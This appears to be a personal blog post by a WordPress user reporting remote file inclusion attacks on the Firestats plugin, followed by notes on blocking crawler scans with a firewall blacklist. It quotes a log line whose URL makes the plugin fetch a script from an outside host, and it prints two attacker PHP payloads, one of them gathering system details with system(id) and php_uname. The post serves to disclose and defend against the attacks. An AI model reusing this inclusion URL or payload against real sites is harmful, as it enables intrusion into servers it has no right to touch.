tech.sweetnam.eu

The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there has been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The scripts themselves seem to have two versions. The most common one like above has the following contents:

<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>

The other one contains the following:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }

echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;

All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.

I’m pretty attentive when it comes to securing my server and I can be exceptionally pedantic when deciding what constitutes bad behaviour or misuse of my webserver. Typically this would include crawlers that ignore robots.txt and script kiddies looking for certain versions of software etc.

To that end I tend to use a combination of blacklisted networks which are blocked on the webserver using shorewall and user agent matching which is performed on my reverse proxy.

For the past two days I have had repeated attempted crawls from Chinese netspace. All looking for the same vulnerabilities and almost all using libwww-perl as their useragent, an example of which is below:

61.151.239.75 – - [28/Jan/2009:18:08:38 +0000] “GET http://blog.sweetnam.eu:80//blogtest/xmlsrv/xmlrpc.php HTTP/1.1″ 403 2371 “-” “libwww-perl/5.803″ TCP_DENIED:NONE

The crawler above appears as being from CHINANET Shanghai province network but I have had literally thousands of scan attempts from many different Chinese addresses. So once more I have decided to completely block all of China from accessing my webserver in addition to the other hosts that I block as well.

The link below contains a list of IP addresses that my firewall rejects requests from. The first 763 lines are from China alone.

http://tech.sweetnam.eu/blacklists/blacklist.txt